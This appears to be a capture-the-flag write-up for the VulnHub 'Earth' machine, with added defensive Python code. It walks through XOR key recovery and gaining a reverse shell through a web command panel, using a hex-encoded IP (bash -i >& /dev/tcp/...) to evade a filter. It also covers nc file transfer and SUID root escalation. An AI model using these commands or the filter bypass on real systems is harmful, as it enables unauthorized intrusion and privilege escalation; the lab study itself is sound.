VulnHub practice range - The Planets: Earth



Attacker: Kali

Target: The Planets: Earth (NAT network segment)

Download link


Information gathering and exploitation

Host discovery

As shown in the figure, a Python script is used to scan the subnet for the target's IP address.

Port scan

nmap -O -sV -p- -A -oN earth_namp.txt

As shown in the figure, three ports are open: 22, 80 and 443. Both 80 and 443 are served by a Python 3.9 application.


As shown in the figure, opening the IP address directly returns Bad Request (400). Now look closely at the nmap scan results:

Two DNS names are visible in the certificate, so the hosts file has to be edited manually.

Windows: C:\Windows\System32\drivers\etc\hosts

Linux: /etc/hosts

ipconfig /flushdns

Refresh the DNS cache (Windows)

At this point the page loads normally.




Directory scan

python3 -u https://earth.local/

python3 -u

Visit each result in turn.

The browser plug-in identifies the framework as Django.

Check whether Django's DEBUG mode is on: entering a random URL returns a plain Not Found page, which shows that DEBUG mode is off.

Is this Django? The entries in robots.txt end in a wildcard (*), so their real suffix is unknown and they cannot be requested as-is. The last one is testcognos*; guessing that the suffix is .txt gives the following:

Notes on testing the secure messaging system:

* XOR is used as the encryption algorithm; it should be as safe as when used in RSA.

* Earth has confirmed that they have received the messages we sent.

* testdata.txt is used to test the encryption.

**\* terra is the username used for the administrator portal.**

**To-do list:**

**\* How can we deliver our monthly keys to Earth securely? Or should we change our keys every week?**

**\* Different key lengths need to be tested to protect against brute force. How long should the key be?**

**\* The messaging interface and the management panel interface need to be improved; they are very basic at present.**

According to radiometric dating estimates and other evidence, the earth was formed 4.5 billion years ago. In the first billion years of earth's history, life appeared in the ocean and began to affect the earth's atmosphere and surface, leading to the diffusion of anaerobic organisms and later aerobic organisms. Some geological evidence suggests that life may have existed as early as 4.1 billion years ago.

From the above, we can extract the following information:

1. terra is the administrator username.
2. XOR (exclusive or) is used for encryption.
3. The Previous Messages on the home page need to be XORed with testdata.txt to decrypt them and recover the key.
4. It's a CTF, yes 🤣


import binascii

# c: the hex-encoded message copied from the Previous Messages field on the home page
# (the value itself is not reproduced on this page)
c = "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"

# m: the known plaintext, i.e. the contents of testdata.txt
m = "According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago."

m = binascii.b2a_hex(m.encode("utf-8"))

# XOR ciphertext and plaintext as big integers; the result is the repeating key, in hex
result = hex(int(c, 16) ^ int(m, 16))
print(result)
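The snippet above relies on an online hex decoder and on spotting the repetition by eye. As an added example (not the writeup's own code), the Python below does the same known-plaintext step on bytes, which keeps leading zero bytes that the int()/hex() trick would drop, and then reads off the repeating key automatically, so it also reveals the key length that the notes' to-do list worries about. The ciphertext here is constructed from a sample key; the box's real key is not reproduced.

```python
from itertools import cycle

# Known plaintext: the contents of testdata.txt quoted on the page.
KNOWN_PLAINTEXT = (
    "According to radiometric dating estimation and other evidence, Earth formed "
    "over 4.5 billion years ago. Within the first billion years of Earth's history, "
    "life appeared in the oceans and began to affect Earth's atmosphere and surface."
).encode("utf-8")

# Constructed key for the demonstration only (not the real one from the box).
SAMPLE_KEY = b"constructed-sample-key!"


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR: the key is cycled until the data is exhausted."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def recover_keystream(ciphertext: bytes, known_plaintext: bytes) -> bytes:
    """Known-plaintext step: ct XOR pt gives the keystream over the overlap.
    No cycling here: bytes beyond the known plaintext stay unknown."""
    n = min(len(ciphertext), len(known_plaintext))
    return bytes(c ^ p for c, p in zip(ciphertext[:n], known_plaintext[:n]))


def shortest_period(stream: bytes) -> bytes:
    """Smallest prefix whose repetition reproduces the whole stream; for a
    keystream clearly longer than the key, that prefix is the key itself."""
    for length in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % length] for i in range(len(stream))):
            return stream[:length]
    return stream


def recover_key(ciphertext_hex: str, known_plaintext: bytes) -> bytes:
    """The page's procedure end to end: hex message from the site XOR
    testdata.txt, then read off the repeating unit."""
    keystream = recover_keystream(bytes.fromhex(ciphertext_hex), known_plaintext)
    return shortest_period(keystream)


if __name__ == "__main__":
    # Constructed ciphertext: what the site would display for SAMPLE_KEY.
    demo_ct_hex = xor_bytes(KNOWN_PLAINTEXT, SAMPLE_KEY).hex()
    print(recover_key(demo_ct_hex, KNOWN_PLAINTEXT))
```

Because XOR is its own inverse, reusing one short key across messages hands the key to anyone who knows a single plaintext, which is exactly why the notes' "as safe as RSA" assumption fails.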


Convert the hex result back to characters with an online tool.

Result obtained:


The decoded output is one string repeated over and over: Earth climate change bad4humans

Therefore, the account and password are obtained:



As shown in the figure, the login succeeds and lands on a command execution interface.

Entering id;ls shows that commands run as the apache user and lists the current directory. According to the VulnHub description: "there are two flags on the box: a user and root flag which includes an MD5 hash".

flag 1

So there are two flags: user and root.

Running find / -name "*flag*" locates the first flag at /var/earth_web/user_flag.txt.

As shown in the figure, we get the first flag. According to the description, the second flag is in root's home directory, so we need to escalate privileges to root to read it.


bash -i >& /dev/tcp/ 0>&1

As shown in the figure, the command is rejected: remote connections are prohibited.

After reading an expert's article, it turns out the IP address can be written in hexadecimal. I don't know why; just copy it. Remember this technique.

bash -i >& /dev/tcp/0xac.0x1f.0xa0.0x2f/4444 0>&1
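The hex form works because inet_aton(3) accepts hexadecimal and octal octets, so a filter that only pattern-matches dotted-decimal literals never sees the address. As an added example (not from the original writeup), the Python below canonicalizes such literals before matching, which is what a detection rule over command logs or an allow-list check should do; the real fix for the box's flaw is not to pass user input to a shell at all. The command strings used as input are taken from this page, and the function handles only the four-part form (inet_aton also accepts one- to three-part forms).

```python
import re

# One address part as inet_aton(3) accepts it: decimal (172), hex (0xac) or octal (0254).
_PART = r"(?:0[xX][0-9a-fA-F]+|[0-9]+)"
_DOTTED = re.compile(rf"(?<![\w.]){_PART}(?:\.{_PART}){{3}}(?![\w.])")
# What a naive "block remote IPs" filter typically looks for: dotted decimal only.
_DECIMAL_ONLY = re.compile(r"(?<![\w.])[0-9]{1,3}(?:\.[0-9]{1,3}){3}(?![\w.])")


def _octet(part: str):
    """Parse one part with inet_aton's base rules; None if it is out of range."""
    if part[:2].lower() == "0x":
        value = int(part[2:], 16)
    elif len(part) > 1 and part[0] == "0":
        value = int(part, 8)          # raises ValueError on digits 8/9
    else:
        value = int(part, 10)
    return value if 0 <= value <= 255 else None


def normalize_ipv4(literal: str):
    """Return the canonical dotted-decimal form of a four-part literal, or None."""
    parts = literal.split(".")
    if len(parts) != 4:
        return None
    octets = []
    for part in parts:
        try:
            value = _octet(part)
        except ValueError:
            return None
        if value is None:
            return None
        octets.append(value)
    return ".".join(str(o) for o in octets)


def naive_ip_literals(text: str):
    """Literals a decimal-only filter would catch."""
    return _DECIMAL_ONLY.findall(text)


def canonical_ip_literals(text: str):
    """Literals a canonicalizing filter catches, normalized to dotted decimal."""
    found = []
    for token in _DOTTED.findall(text):
        normalized = normalize_ipv4(token)
        if normalized is not None:
            found.append(normalized)
    return found
```

Run over the two reverse-shell lines from this page, the decimal-only filter finds nothing in the hex variant while the canonicalizing one reports 172.31.160.47 for both spellings.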

OK, I got the shell. Next I'll escalate privileges; first, gather information:
cat /etc/passwd

As shown in the figure, only two users have /bin/bash as their shell: root and earth.

uname -a



SUID privilege escalation

find / -perm -u=s -type f 2>/dev/null

As shown in the figure, /usr/bin/reset_root looks like the way to obtain root privileges.

Run it directly:

Check for reset triggers

Reset failed, all triggers do not exist

As expected, it failed.

It can't be debugged on the target machine, so download the binary to Kali for debugging; nc can be used to transfer the file.

Start the receiver on Kali first:

nc -l 5555 > reset_root

Then start the sender on the target:

nc 5555 < /usr/bin/reset_root

The transfer completes instantly.

Now reset_root has been downloaded and can be debugged. Here we need to learn a new command: strace.

If you don't have this command, you can install it first.

Before use, give reset_root execute permission:

chmod +x reset_root

strace ./reset_root

The output shows three "No such file or directory" errors:

access("/dev/shm/kHgTFI5G", F_OK)       = -1 ENOENT (No such file or directory)

access("/dev/shm/Zw7bV9U5", F_OK)       = -1 ENOENT (No such file or directory)

access("/tmp/kcM0Wewe", F_OK)           = -1 ENOENT (No such file or directory)

So the failure is probably because these three files do not exist on the target. Nobody knows what, if anything, they are supposed to contain, so first check whether the target has them; if not, create them (empty) and run the binary again.

As shown in the figure, the target really has no strace command. Awesome.

Create the files and run again:

The output reads: resetting root password to: Earth. So the root user's password has been changed to Earth.

Switch to root

As shown in the figure, it is now root.

flag 2


  1. The difficulty lies in recovering the password: it is obtained by XORing the known plaintext with the ciphertext.
  2. Newly learned: nc can be used to transfer files.
  3. Newly learned: the strace command, very powerful.
  4. bash -i >& /dev/tcp/0xac.0x1f.0xa0.0x2f/4444 0>&1 writes the IP address in hexadecimal; learned.

Keywords: Linux, Web Security, vulnerability

Added by pureDesi on Sat, 12 Feb 2022 12:46:46 +0200